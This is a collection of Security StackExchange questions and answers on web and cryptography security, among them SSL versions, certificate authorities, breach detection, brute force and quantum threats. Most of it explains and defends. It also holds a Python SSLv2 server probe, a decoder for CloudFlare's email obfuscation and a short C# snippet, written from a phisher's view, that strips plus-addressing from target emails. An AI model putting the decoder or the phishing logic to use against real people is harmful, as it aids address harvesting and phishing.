No cryptography using client-side JavaScript can be secure without HTTPS. Any MITM attacker can send JavaScript that can do anything with the secrets the browser has access to, and then there will be no secret. If you absolutely cannot use HTTPS, the user must have a tool to compute the response outside the browser and paste the result into the browser. Even so, any data transmitted after the authentication is still subject to interception and modification, which makes the authentication pretty useless from a user-protection perspective. Please read: What's wrong with in-browser cryptography? - Tony Arcieri, or Javascript Cryptography Considered Harmful - NCC Group, or the 1,030,000 results returned for searching "wrong with javascript cryptography" on Google. Edit: BTW, even if you use an external program to handle the authentication and maybe even encryption of the data that goes over HTTP, you may still have lower security compared to just using HTTPS. The best example is the Korean SEED cipher, which exposes users by locking them into, and training them to trust, ActiveX controls and IE (see this blog article ).
{ "source": [ "https://security.stackexchange.com/questions/116144", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103036/" ] }
116,248
I'm going to create a new website with Joomla! 3. Potentially, this site will get me some money through ads, but I'm a little worried about what could be done to attack it. I say a little because I'm not hoping for huge revenues and I don't think someone will try to bribe me into giving them control of my site (like it happened to the owner of the @N twitter account), but when dealing with black hats you never know. I do not need to provide public authentication or to have people other than me input data on this website (I might accept inputs via mail and copy-paste them by hand after checking their content, since I want the writing quality to be good and consistent with the rest of the site). I will use free Joomla! themes - the basic ones included with the standard installation might do fine. Is there any threat that I, as a security noob who understands a little about how the Internet works (let's say just enough to understand Heartbleed), absolutely need to protect against? Should I hire a professional developer for my project, or are there just a few things I should do to protect my site reasonably (making hacking not worth the effort) that I could learn about in, say, under a month of an 8/5 worker's free time?
The most important thing to do when you use 3rd party applications like Joomla! is to always keep them up-to-date. Most attacks are targeting vulnerabilities which were patched long ago and only hit those people who neglect updating. So create a regular reminder in your calendar to check if an update is available for Joomla (as well as any themes and plugins you are running) and install it. Updating Joomla is very simple, because it can be done from within the administration interface. You don't need any advanced IT skills to do that. But it is very important to do this regularly! Be wary of any plugins, themes, extensions and other addons which did not release any update for a long time. It means that either that addon is perfect and has no security problems, or that the developer simply doesn't care to release any more updates to fix security vulnerabilities. But the latter case is much, much more likely. You should also check the Vulnerable Extension List regularly and avoid everything listed there. For more information, consult the security and performance FAQ on the Joomla wiki. This actually applies not just to an application like Joomla but to your whole software stack, from operating system to webserver to PHP to MYSQL. OS and webserver also need to be configured securely. But when you use a hosted solution, then the provider will likely take care of everything except the applications you install yourself, so you likely don't have to worry about that. But it's a different thing when you rent a virtual server which provides you with a naked operating system (or not even that) and expects you to set up everything on your own. In that case you are responsible for updating everything. When you require this for your project, you should consider hiring someone who knows how to harden a server properly, who knows which components need to be updated and how this is done. But the person you are looking for is not a software developer. It's a system administrator .
{ "source": [ "https://security.stackexchange.com/questions/116248", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103140/" ] }
116,301
The POODLE vulnerability exploited a weakness in SSLv3. The newer DROWN vulnerability exploits a weakness in SSLv2. Part of my protection against POODLE (for my webserver) was to disable SSLv3 and earlier. So am I already safe from DROWN?
POODLE is an abuse of a flaw in SSL 3.0. You are technically protected against POODLE if you disabled support for SSL 3.0. DROWN leverages a flaw in SSL 2.0. You might be technically protected against POODLE, in the sense explained above, and still be vulnerable to DROWN. Of course, SSL 2.0 has other flaws and it was already deprecated / forbidden; it has been so for a long time. The advice for POODLE was often worded as "deactivate everything that is older than TLS 1.0" and this includes SSL 2.0, but, honestly, SSL 2.0 should have already been deactivated, killed, and its corpse dumped at sea, long before POODLE. If you had to wait for POODLE to disable SSL 2.0, then you were already very very sloppy. There is no upper limit to sloppiness, so you are encouraged to test whether your server still accepts SSL 2.0. Just in case.
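If you want to test a host yourself, one rough approach is to send an SSLv2 ClientHello and see whether the server answers with an SSLv2 ServerHello. A best-effort Python sketch (the record layout follows the old SSL 2.0 draft as I understand it; many servers will simply close the connection, and dedicated scanners do a far more thorough job):

    import socket
    import struct

    def offers_sslv2(host, port=443, timeout=5):
        """Best-effort probe: does the server answer an SSLv2 ClientHello?"""
        # Three legacy SSLv2 cipher kinds, including a 40-bit "export" one.
        ciphers = bytes.fromhex("010080" "020080" "060040")
        challenge = b"\x00" * 16
        body = (b"\x01"                    # message type: CLIENT-HELLO
                + b"\x00\x02"              # version: SSL 2.0
                + struct.pack(">H", len(ciphers))
                + struct.pack(">H", 0)     # session-id length
                + struct.pack(">H", len(challenge))
                + ciphers + challenge)
        record = struct.pack(">H", 0x8000 | len(body)) + body
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(record)
                resp = s.recv(16)
        except OSError:
            return False
        # An SSLv2 ServerHello starts with a 2-byte record header (high bit
        # set) followed by message type 0x04.
        return len(resp) >= 3 and bool(resp[0] & 0x80) and resp[2] == 0x04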
{ "source": [ "https://security.stackexchange.com/questions/116301", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71333/" ] }
116,354
I saw this on CloudFlare's homepage: CloudFlare protects against a range of threats: cross site scripting, SQL injection, comment spam, excessive bot crawling, email harvesters, and more. How could a company like CloudFlare block crawler bots and email harvesters? I assume they are smart enough not to use User-Agent: Evil-Email-Harvester . So how do you differentiate a bot like an email harvester from a normal user? I guess you could see that it is some kind of bot because you get requests for multiple sites from the same IP. But that would also be the case for many legit IPs, like a VPN. How do you tell the good from the bad?
CloudFlare serves as a guard between your webserver and the client. Every piece of content the client receives was provided by your webserver and filtered by CloudFlare. This way, CloudFlare obfuscates email addresses by filtering them with a regex before delivering the page to the client. If your website contains the email

    <a href="mailto:[email protected]">[email protected]</a>

CloudFlare will replace it with

    <a href="/cdn-cgi/l/email-protection#fed8ddcfcfcbc5d8ddc8cac5d8ddcfcfcbc5d8ddc7c7c5d8ddcfcecac5d8ddc7c9c5d8ddcac8c5d8ddc7c6c5d8ddcfccccc5">&#115;&#64;&#115;&#99;&#104;&#97;&#46;&#98;&#122;</a>

The /cdn-cgi/ folder, though it still points to the webserver, is handled by CloudFlare, which will automatically deobfuscate the value and return the correct email address. Of course this is not bulletproof (that is simply not possible), as a bot can follow that URL or search for encoded email patterns. But that is a rare occurrence, and most of today's simple crawlers won't find your email. You shouldn't rely on this approach - CF is already quite popular and it is easy to detect and deobfuscate those email addresses. Using your own, unique obfuscation techniques is more likely to be safe against intelligent harvesters, as it is too much work to adapt the crawler for every single obfuscation technique.
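The obfuscation itself is easy to reverse: as commonly understood, the hex string after email-protection# starts with a one-byte key, and every following byte is XORed with that key. A small sketch of a decoder (the function name is mine, and CloudFlare could change the scheme at any time):

    def decode_cf_email(encoded: str) -> str:
        """Decode a CloudFlare 'email-protection' hex string."""
        data = bytes.fromhex(encoded)
        key = data[0]
        return bytes(b ^ key for b in data[1:]).decode("utf-8")

    # The hex string from the example above:
    print(decode_cf_email("fed8ddcfcfcbc5d8ddc8cac5d8ddcfcfcbc5d8ddc7c7c5"
                          "d8ddcfcecac5d8ddc7c9c5d8ddcac8c5d8ddc7c6c5d8ddcfccccc5"))
    # In this particular example the result is itself a string of HTML
    # character entities, because the visible link text was entity-encoded too.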
{ "source": [ "https://security.stackexchange.com/questions/116354", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98538/" ] }
116,391
In our IT Security class we have been told that you need CAs to prevent attacks on a digital signature. Sadly, our lecturer didn't elaborate on how such an attack would be performed - I can only guess that someone would try to do a MitM: Alice wants to authenticate herself to Bob, so she writes him a message and signs it with her private key. She also appends her public key. Eve intercepts the message and verifies it with Alice's public key, then signs the message with her own private key and forwards it to Bob, appending her own public key instead of Alice's. Bob receives the message assuming it's from Alice, verifies it with the appended public key (from Eve), and is now sure he is communicating with Alice. So if Bob had just looked up Alice's public key at some CA, he would have known that the appended key was wrong. Is that the scenario people are generally referring to when it comes to why you need CAs?
A digital signature , like all cryptographic algorithms, does not solve problems; it just moves them around.

Take care that signatures are NOT encryption. If someone tried to explain signatures as a kind of encryption, then go find them and hit them in the teeth with a wrench, repeatedly. Tell them that they are unworthy, and I am disappointed with them. This flawed explanation does not work, never worked, and spreads only confusion.

In a signature system, there is a message m, a public key k_p, a private key k_s, and a signature s. The signature generation algorithm computes s from m and k_s. The signature verification algorithm takes m, s and k_p, and returns either "true" or "false". When it returns "true", what this means is that whoever owns the public key (i.e. knows the corresponding private key) was involved in the generation of signature s on the specific message m.

The important point is in the key ownership: the signature verification algorithm does not tell you "yep, this is signed by Bob"; it only tells you "yep, this is signed by whoever owns that public key". This guarantees that the signer is really Bob only if you have a way to make sure that the public key you see is really Bob's public key. If Bob simply sent his public key along with the signed message, it would be easy to impersonate Bob by simply saying "hello, I am Bob, here is my public key, and here is my signed message". It would prove nothing at all. The attack here is simple, it is called "lying". While signatures are useful (indeed, they reduce the problem of verifying the provenance of several messages to the problem of associating a single public key with its owner), they don't magically guarantee ownership out of thin air.

This is where Certification Authorities come into play. The CA is an organisation whose job is to make sure that Bob really owns his alleged public key; presumably, the CA does that by meeting Bob in person, or some other mechanism of that kind. When the CA has duly verified Bob's ownership of his key, the CA puts Bob's identity (his name) and his public key in a certificate . The CA then signs the certificate. Alice's machine can then verify the signature on the certificate, thereby making sure that the certificate contents are really from the expected CA. At which point Alice has some guarantee about the fact that the public key she sees in the certificate is really Bob's key, and she can use it to verify signatures which have purportedly been computed by Bob.

At this point you should say: "But how can Alice verify the signature on the certificate by the CA? She would have to know the CA public key!" And, indeed, the problem has again been moved, to the question of CA key ownership. We can move it yet another time, with another CA. And so on. But it must stop somewhere. That "somewhere" is the root CA . A root CA is a CA whose public key you already know, absolutely. That's the magic part. In practice, your computer comes with an operating system that already includes the public keys of a hundred or so root CAs, who made a deal with Microsoft to the effect that their public keys are inherently known (and trusted) by all Windows systems.
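To make the "key ownership" point concrete, here is a small sketch using the third-party Python cryptography package, assuming an RSA key with PKCS#1 v1.5 padding and SHA-256 (the function name and setup are mine, purely for illustration). Note what the check can and cannot tell you:

    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    from cryptography.exceptions import InvalidSignature

    def signed_by_key(public_key_pem: bytes, message: bytes, signature: bytes) -> bool:
        """True if 'signature' over 'message' verifies under this public key.
        It says nothing about WHO owns the key - that binding is exactly
        what a CA-issued certificate is supposed to provide."""
        public_key = serialization.load_pem_public_key(public_key_pem)
        try:
            public_key.verify(signature, message,
                              padding.PKCS1v15(), hashes.SHA256())
            return True
        except InvalidSignature:
            return False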
{ "source": [ "https://security.stackexchange.com/questions/116391", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90118/" ] }
116,396
I'm always concerned about the security of the services I use. I'm even more concerned since security breaches have been happening more and more lately, and they always generate a lot of noise in the media. Now, I'm already trying to secure my accounts as much as possible, like using 2FA wherever possible and using a strong password manager. However, these measures won't protect me when a service itself suffers a breach. Is there a somewhat reliable method to detect security breaches before they are announced, so I can act rather than just react? Optional bonus question : What steps can I take to ensure the security of my data in case there's an unannounced breach?
You can't detect it with 100% certainty, because not everyone who steals your data wants to phish you, or sell it. But for those who do want to phish you - and that's a large portion of them - there are some tricks you can apply. In most places, you cannot provide fake details. You need to enter your name, physical address, credit card information, social security number, etc. You don't really have much control over the real details. However, what you do have control over is your email address. You can always provide a dummy email account to anyone, for any reason, even if the rest of your details are required to be legitimate.

Roving Email Address Method

Let's call this REAM . I like REAM. Here's what I do: I buy a few domains and create unlimited amounts of email addresses, then use a different email address for each website on which I have an account. I also use Gmail, Yahoo, etc.

- Buy 2-3 reasonable domain names, and give the accounts reasonable, unique names like [email protected] , [email protected] , etc. You can also use free email providers, but having to repeatedly enter your phone number might cause you some issues. It's a lot of work, but it pays off in the long run.
- When you're asked for your email address at a retailer, give them one of those emails, and use it ONLY for them. Make sure you use each email address only once.
- Carry a list of email addresses in your wallet.

Now why would we want to detect phishing, instead of sending it to the spam folder? Because a phishing attempt on these emails may indicate a breach. I've found, with astounding regularity, and without even providing my email address to additional companies beyond the first one, that I get phished on a regular basis on each account. In fact, I've seen dozens of such breaches. Here's a small list of some notable phishing attacks I've found:

- OPM (2011, undisclosed until 2015)
- IRS (2015, undisclosed until late 2015)
- IRS (2016. Repeat of 2015? Undisclosed until recently)
- Pizza Hut (early 2015, breach still undisclosed)
- Target (2013?)

In most of the emails, the attackers usually have bad English. In some, they do not. They'll also google a location near the provided address, and say they have a job opportunity, etc. In some cases, I will even get phone calls from them in the same area code as me! It's actually very easy to get a burner phone at Wal-Mart and have it set to the same area code as your victim. If you're clever enough, and they're in the same country, then you can quickly lead them down the path of the damned. In nearly every case, they try to get me to click on an infected website. I will go there anyway (on a dummy+virtual machine, obviously) because I am a masochistic security researcher who revels in reverse-engineering malware, and making attackers suffer. Suffer mortals as your pathetic magic betrays you! You may not want to visit them, however.

The Multiple Phone Number Method

Some like to try and use multiple phone numbers. I would not do this. It's neither reliable nor effective because:

- Phone numbers can be enumerated very easily, and auto-dialed/texted.
- It costs a lot of money to have multiple phone numbers.
- You'll likely get calls from people who knew the previous owner of the number.

Therefore, REAM is a much better way than this.

The Plus Email Address Method

I guess we can call this PEAM . Others have suggested the plus email address method. Gmail supports this. For example, if your email address is [email protected] , it's recommended to use [email protected] instead.
Google will apparently discard the plus side of the email address. Using this method could be good for a lot of reasons. However, very few - if any - of those reasons would apply to actual skilled phishers. I would not recommend using this method because it may only work against run-of-the-mill spammers, not actual skilled phishers. Here's why:

- Phishers are more intelligent than the average spammer. They are targeting you personally. If you respond, they will build a profile on you, or maybe they already have a profile built on you based on stolen data sets.
- Spammers are willy-nilly sending spam to everyone they can. Your plus addressing still gets delivered to your inbox. And you just know you want those lengthening pills... so you end up buying them anyway, and they don't work, and all the women laugh at you. [ sobbing uncontrollably ] Ahem...
- This method can be easily circumvented with code. I'll demonstrate:

    List<string> possiblyIntelligentTargetList = new List<string>();
    foreach (string email in emailAddressCollection)
    {
        // We might've found a plus-size individual
        if (email.Contains("+"))
        {
            // Ignore the plus part of the email address
            string realEmailAddress = email.Split('+')[0] + "@" + email.Split('@')[1];

            // Phish the user's actual email address.
            PhishUser(realEmailAddress);

            // Add their provided email to a new list so we can analyze it later
            possiblyIntelligentTargetList.Add(email);
        }
        else
        {
            PhishUser(email);
        }
    }

Of course, this could be made much better, but this is a rough example of how easy it would be to do this. It only took me like 0.05 milliseconds to write this. With the above code snippet, the plus side of the email address is discarded. Now how will you know where the breach came from? Because of this, I would recommend that you get REAM ed.

Trawling the "Deep Web"

bmargulies brings up an interesting, and very good point: your data may sometimes appear on the Deep Web. However, this information is usually for sale. While yes, it may be possible to detect a breach before it's announced by visiting the Deep Web or using an Identity Protection Service that does, this method has its drawbacks as well. Here are a few problems I see with looking on the Deep Web:

- While some Identity Protection services are excellent, they may cost a fair bit of money.
- Identity protection services may be provided for free, but they usually come after the breach announcement, and the protection only lasts for a limited time, usually around 1-2 years.
- You usually have to buy this information from attackers, unless they released it for the Lulz.
- The breached data simply may not appear on the Deep Web at all.

As you can see, there are a lot of pros and cons to every single method here. No method is perfect. It's impossible to get 100% perfection.

REAM also detects individual breaches

This method doesn't just detect breaches at companies. It detects breaches of individuals. You may find that, after giving someone your email address, they send you phishing attacks several months later. It may come from them, or it may come from someone else who hacked them.

Now that my data has been stolen, what do I do?

If you have a strong suspicion that your sensitive information has been stolen, you should do the following:

- Shut down and replace all credit and debit cards associated with the aforementioned email address.
- Put a freeze on your credit so they can't do anything with the details.
- Inform the company/individual that they've likely been hacked, so they can take the appropriate steps.
Read about Virtual Credit Cards in the answer provided by emory for the bonus question below.
{ "source": [ "https://security.stackexchange.com/questions/116396", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
116,404
I have it so flash doesn't start on page load, for security and performance. Lately I have been noticing that some pages will load with a flash document that takes up the full screen. I can see it because it has not started running and gives the gray box to enable flash. I found that when this flash document is loaded it is invisible and tricks the user by taking the click actions of the user when the user thinks they're clicking on the page. I would like to know what this is and how to get rid of it altogether. It looks to be used to reroute users to advertisements. I have noticed it on a lot of news websites from google news. Has anyone else discovered this on a website and found out what it is and how to stop it? So far, since the flash document has not loaded, what I have to do is right-click on it and have it hidden and not run. This feels like a workaround for something that a user should not have to deal with.
{ "source": [ "https://security.stackexchange.com/questions/116404", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59642/" ] }
116,413
I noticed the following site: nightchamber.com A user account is automatically generated on first visit and keyed against a UUID; the id is then stuffed into the session and used to make a link the user can bookmark to get back to their "account". As long as that link/id remains secret, the user has a unique account to use with no effort on their part. Are there any immediate drawbacks to using this method for a super-fast login and/or signup?
{ "source": [ "https://security.stackexchange.com/questions/116413", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89162/" ] }
116,566
I've watched Mr. Robot lately and can't stop thinking why it was so hard to decrypt files encrypted using AES encryption with a 256-bit key. Let us say the only method to find the key is through brute force. Can't we set a computer to brute force starting from the first possible key, and another to begin from the last possible key, and perhaps a few computers to try the keys in the middle? Wouldn't that reduce time dramatically?
Sure it's possible, but it doesn't really help. The number of possibilities is just too large. Consider that a 256-bit key has 2^256 possible values. That's 12×10^76, or 12 followed by 76 zeroes. If we generously assume that a computer can test a trillion (that's 10^12) possible keys a second, and that we have a trillion computers (where will we get them from?) performing the key search, it will take 12×10^76 / (10^12 × 10^12) seconds to search the entire keyspace. That's 12×10^52 seconds. As there are only 3,155,760,000 seconds in a century, it will take approximately 4×10^43 centuries to try all possible keys. There's a 50-50 chance that you'll find the key in only half that time. That's the way encryption is designed. The number of possibilities is just too large to be cracked in a time that is interesting for humans.
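The arithmetic above is easy to reproduce yourself; a quick sketch:

    # Reproduce the estimate above: a trillion machines, each testing a
    # trillion keys per second, exhausting a 256-bit keyspace.
    keys = 2 ** 256
    rate = 10 ** 12 * 10 ** 12          # total keys tested per second
    seconds_per_century = 3_155_760_000

    seconds = keys // rate
    centuries = seconds // seconds_per_century
    print(f"{centuries:.2e} centuries to try every key")   # ~4e43
    print(f"{centuries / 2:.2e} centuries on average")     # 50-50 chance at half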
{ "source": [ "https://security.stackexchange.com/questions/116566", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103485/" ] }
116,596
This is a spin off from: Use multiple computers for faster brute force Here's at least one source which says that quantum computers are on the way to being able to break RSA in the not too distant future. I am not a security expert, and don't know the difference between that and AES, but might this throw a monkey wrench into this idea that it's impossible to crack these modern encryption mechanisms? MIT's new 5-atom quantum computer could make today's encryption obsolete Perhaps some of you who are more knowledgeable on the subject could weigh in?
Quantum computing will change the encryption game, but it is not yet clear how much it will change it. It's not clear because we are not yet certain what sorts of problems quantum computers can solve. As mentioned, RSA is dramatically weakened by quantum computing because the factoring of primes can be done in polynomial time using Shor's Algorithm. However, not all cryptographic routines are known to be as weak against quantum computing.

You may have heard of P (polynomial time), NP (nondeterministic polynomial time -- problems that, given the right answer, can be checked in polynomial time), and NP-Complete (the hardest NP problems). Prime factorization of large composite numbers is known to be an NP problem and is thought by many not to be a P problem. That means a conventional computer would most likely¹ need super-polynomial time (at best sub-exponential time, like GNFS ) to do the factorization, and RSA encryption depends on this.

NP-complete is a slightly more demanding class of problem. Any instance of an NP problem can be reduced to an instance of an NP-complete problem. (This is true even if the NP problem is another NP-complete problem.) This means that if you ever found a polynomial time solution for an NP-complete problem, you would have a polynomial time solution for every NP problem. If you did so using a classical computer, you would have proven P = NP.

Quantum computers have their own complexity class. BQP is the class of problems that can be [statistically] solved by a quantum computer in polynomial time. It is known that factorization is in BQP, because we have Shor's algorithm. What is yet unknown is whether BQP contains NP-complete or not. It is currently theorized that it does not, meaning there are NP-complete problems that still take exponential time even with a quantum computer, but the mathematicians are still crunching away at that theory.

Integer factorization sits in an interesting middle ground. We know it is part of BQP (because we found Shor's algorithm). We also know that it is a problem within NP (it is NP because the factorization can be proven in polynomial time just by multiplying the numbers back together). What we don't yet know is whether it is P, NP-but-not-P, or NP-complete. Nobody has been able to prove it one way or another. It could actually be a P problem, solvable with a classical computer in polynomial time, making it very weak for encryption purposes. It could be an NP-complete problem, which, given that we know it is in BQP, would imply that quantum computers can solve any NP problem in polynomial time, which would be a major blow to cryptography in general.

Many upcoming encryption algorithms are starting to use other problems besides prime factorization as their root. In particular, a set of problems based on lattices are thought to be particularly hard to break using quantum computers. If all NP problems are part of BQP, this won't help any, but we're still figuring that detail out to this day.

As it turns out, AES is not affected by Shor's algorithm. Grover's algorithm allows brute-forcing an n-bit key in O(2^(n/2)) time instead of the O(2^n) time required by classical computers. Therefore, a 128-bit AES key could be brute forced in O(2^64) time by a sufficiently powerful quantum computer that can run Grover's algorithm with 128+ qubits for on the order of 2^64 steps.

¹ The wise and challenging commenters below are picking away at the imprecision in my wording. Technically it is not known whether NP problems require exponential time or not. It is possible that the NP class of problems and the P class of problems are the same. However, most mathematicians believe it is much more likely that P != NP, simply because so far it doesn't look like it. If we want to talk in betting terms, just look at how much you could make answering the question. If you prove P and NP are distinct, you can earn the Clay prize of a million dollars, and maybe get a cushy job offer for being so smart. If you prove they are the same, I would expect the NSA to be willing to pay quite a lot more for you to be silent about your discovery, and instead hand over your papers to their mathematicians.

If you are very interested in the topic of quantum computing and encryption, I highly recommend reading up on the different complexity classes such as P and NP. They're worth your time.
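To make the Grover speedup from the AES paragraph above concrete, here is a quick back-of-the-envelope comparison (the key-testing rate is an assumption chosen only for illustration):

    rate = 10 ** 12                      # assumed key tests per second
    year = 31_557_600                    # seconds in a Julian year

    classical = 2 ** 128 / rate / year   # brute force AES-128 classically
    grover    = 2 ** 64  / rate / year   # with Grover's quadratic speedup

    print(f"classical: ~{classical:.1e} years")   # ~1e19 years
    print(f"grover   : ~{grover:.1e} years")      # well under a year
    # The quadratic speedup is real, but doubling the key size (AES-256)
    # restores a 2^128 work factor even against Grover.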
{ "source": [ "https://security.stackexchange.com/questions/116596", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92894/" ] }
116,694
In the past I have completed an 'anonymous' survey at work only to find that my employer was able to garner a lot of not-anonymous information from this survey. Location, name of manager, etc. None of this information was provided in the survey. This leads me to believe that somehow the website has been able to identify some form of user information. Is there a way that a webpage can read user or other system related information? The site in question has aspx and js elements. I cannot think of any other way they could identify the user. The link doesn't appear unique. Browser is IE, environment is Win7 on Citrix.
If the site is based on ASPX files, then it is more than likely that this is an ASP.NET application - most probably hosted on IIS. IIS has a very simple checkbox to enable Windows Integrated Authentication. IE, on Windows 7, will by default send your credentials to any web server in the local intranet. (This is not your password, don't worry, but it is Windows-based authentication - either Kerberos or NTLM.) This makes it very straightforward to associate your Windows domain account with your survey answers...
{ "source": [ "https://security.stackexchange.com/questions/116694", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103643/" ] }
116,700
As above - if I register a domain name, will my postal address become "googleable" via WHOIS by someone that doesn't know what the domain name is? (Say I have a fairly distinctive first and last name)
Yes. There are numerous web sites which present 'whois' information, and they are indexed by Google. For example, this search:

    "Chen, William" whois

leads to results like this: MazdaMedia.com WHOIS, DNS, & Domain Info - DomainTools, which contain the full WHOIS record as well as other information. Of course, most registrars offer "private registration" services (for a fee, of course) where the details they release are anonymized - instead of your email, they generate a random email address and forward all mail for that address to you, and your name is redacted. Here's an example of a domain that's protected in this manner: Play4kd.com WHOIS, DNS, & Domain Info - DomainTools

    Registry Registrant ID:
    Registrant Name: WHOISGUARD PROTECTED
    Registrant Organization: WHOISGUARD, INC.
    Registrant Street: P.O. BOX 0823-03411
    Registrant City: PANAMA
    Registrant State/Province: PANAMA
    Registrant Postal Code: 00000
    Registrant Country: PA
    Registrant Phone: +507.8365503
    Registrant Phone Ext:
    Registrant Fax: +51.17057182
    Registrant Fax Ext:
    Registrant Email: [email protected]

(If you are reading this after February, 2017, there's no guarantee the link will continue to reflect this protection.)
{ "source": [ "https://security.stackexchange.com/questions/116700", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103656/" ] }
116,738
Let's say that I have a system where one of the security requirements is preventing users from choosing a password that matches their username. Usernames are not case sensitive but the passwords are. The passwords are stored by the server using a secure hashing function that cannot be reversed. When the account is created both the username and password are initially available in plaintext to the server for comparison. We can compare them in memory (while disregarding case) to see if they match and instruct the user to choose a different password if they do. Once this check is satisfied the password is securely hashed for storage while the username is stored in plaintext. No problems meeting the requirement here. When the user wants to change their password, or it is being changed for them, the server can retrieve their username record and compare it to the newly chosen password value (again ignoring case) to see if it matches. No problems meeting the requirement here either. However, the system also allows username changes. During this ID change process the user hasn't necessarily provided their password in plaintext to the server. They may have done so when they authenticated, but the server isn't going to keep that password stored in plaintext just in case they decide to change their username. So the plaintext password is not available to check for a match against the newly chosen username value. In an attempt to meet our requirement the server can use the same secure hashing function to hash the new username and compare it to the recorded hashed password. If they match then the server can instruct the user to choose a different username. However, since the username is not case sensitive this check might fail when it is arguably true. If I submit "PwdRsch1" as a new username choice and my password is "pwdrsch1" then the system will allow it since the hashes won't match. I -- or worse, an attacker -- could then later successfully authenticate with a matching username and password of "pwdrsch1". We could force the username to lowercase before hashing and checking it against the password, but then the reverse scenario is possible. The username would be checked as "pwdrsch1" against a password of "PwdRsch1" and allowed since these don't match. But later I can successfully authenticate with a matching username and password of "PwdRsch1". What reasonable options do I have to reduce this risk of a password matching a username that is not case sensitive?
The only sensible way to get what you want is to ask for the password when a user changes their username. This way the server always has the information needed to conduct an accurate comparison between the username and password during a change, and prevent matches. As sensitive operations - such as changing passwords, or in your case usernames - should require a password anyways (to limit the damage of XSS), this shouldn't be a problem. Your only other alternative is to try every possible case combination, hash it, and compare that to the stored hash when a user changes their username.
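For completeness, here is a rough sketch of that second option, using the Python bcrypt module (the function name is mine, purely for illustration; the number of candidates doubles with every alphabetic character, so it is only workable for short usernames):

    import itertools
    import bcrypt

    def password_matches_username(new_username: str, stored_hash: bytes) -> bool:
        """Try every upper/lower-case variant of the username against the
        stored bcrypt hash. Cost doubles with each alphabetic character."""
        options = [(c.lower(), c.upper()) if c.isalpha() else (c,)
                   for c in new_username]
        for candidate in itertools.product(*options):
            if bcrypt.checkpw("".join(candidate).encode(), stored_hash):
                return True
        return False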
{ "source": [ "https://security.stackexchange.com/questions/116738", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45733/" ] }
116,835
I'm developing an Android app with a MySQL database for storing user login credentials. I'm using jBCrypt for hashing passwords before storing them in the database. On registration, the password is hashed on the client side as follows:

    String salt = BCrypt.gensalt();
    String hash = BCrypt.hashpw("password", salt).split("\\$")[3];
    salt = salt.split("\\$")[3];
    hash = hash.substring(salt.length(), hash.length());

In this case, BCrypt.hashpw() will give me the hash

    $2a$10$rrll.6qqZFLPe8.usJj.je0MayttjWiUuw/x3ubsHCivFsPIKsPgq

I then remove the params ($2a$10$) and store the first 22 characters as salt and the last 31 as hash in the database:

    -------------------------------------------------------------------
    | uid | salt                   | hash                             |
    -------------------------------------------------------------------
    | 1   | rrll.6qqZFLPe8.usJj.je | 0MayttjWiUuw/x3ubsHCivFsPIKsPgq  |
    -------------------------------------------------------------------

Now, whenever a client wants to log in, they enter their username and password and only the salt is returned from the database. The client calculates their hash by calling BCrypt.hashpw() with their salt:

    String salt = "$2a$10$" + returnedSalt;
    String hash = BCrypt.hashpw("password", salt).split("\\$")[3];
    hash = hash.substring(returnedSalt.length(), hash.length());

giving me

    hash = "0MayttjWiUuw/x3ubsHCivFsPIKsPgq"

which is equal to the hash stored in the database. The client then sends the username and the calculated hash back to the server. If they match, the user gets logged in. I know that I can simplify this process by fetching the entire BCrypt hash directly and comparing it with the given password:

    if (BCrypt.checkpw("password", bCryptHash)) // match

but it feels wrong to send the entire hashed password to the user to perform the check. I understand that it is preferable to hash the passwords server-side, but is there something wrong with this solution? Am I missing something? Say that I have an unencrypted HTTP connection between the phone and the server. Would this be a secure solution?
The client is the attacker. Walk around your office while chanting that sentence 144 times; be sure to punctuate your diction with a small drum. That way, you will remember it.

In your server, you are sending Java code to run on the client. The honest client will run your code. Nobody forces the attacker to do so as well; and you use client authentication precisely because you fear that the client may be somebody else, who tries to impersonate the normal user. From your server's point of view, you only see the bytes that you send to the client, and the bytes that come back. You cannot make sure that these bytes were computed with your code. The attacker, being an evil scoundrel, is perfectly able to envision not running your code and instead sending the answer that your server expects.

Consider now a simple password authentication scheme where you simply store the users' passwords in your database. To authenticate, ask the user to send the password, and then compare it with what you stored. This is very simple. This is also very bad: it is called plaintext passwords . The problem is that any simple read-only glimpse at the database (be it a SQL injection attack, a stolen backup tape, a retrieved old harddisk from a dumpster...) will give the attacker all the passwords. To state things plainly, the mistake here is in storing in the database exactly the values that, when sent from the client, grant access.

And your proposed scheme? Exact same thing. You store in the database the hash value "as is". And when the client sends that exact value, access is granted. Of course, the honest client will send the value by hashing a password. But, let's face it: many attackers are not honest people.

Now there is value in doing part of the hashing on the client side. Indeed, good password hashing is an arms race, in which the hashing is made expensive on purpose. Offloading some of the work onto clients can be a nice thing. It does not work as well when clients are feeble, e.g. smartphones with Java, or, even worse, Javascript (which is a completely different thing, despite the name similarity). In that case, you would need to run bcrypt on the client, and store on the server not the bcrypt output, but the hash of the bcrypt output with some reasonable hash function (a fast one like SHA-256 would be fine). The processing of a password P would then be a bcrypt on the client, then a SHA-256 of the result, computed on the server. This will push most of the CPU expense onto the client, and will be as secure as a raw bcrypt for what it is meant to do (see below).

I understand that you want to "encrypt" passwords (hashing is not encryption!) because you want to use plain HTTP. You do not like HTTPS for the same reason as everybody else, which is the dreaded SSL certificate. Paying 20 bucks a year for an SSL certificate would be akin to having your skin removed with a potato-peeler sprinkled with lemon juice. Unfortunately, there is no escaping the peeler. As others have remarked, even if you have a rock solid authentication mechanism, raw HTTP is still unprotected and an active attacker can simply wait for a user to authenticate, and hijack the connection from that point. A very common example of "active attacker" is people who simply run a fake WiFi access point -- that is, a completely real WiFi access point, but they also keep the option to hijack connections at any point.
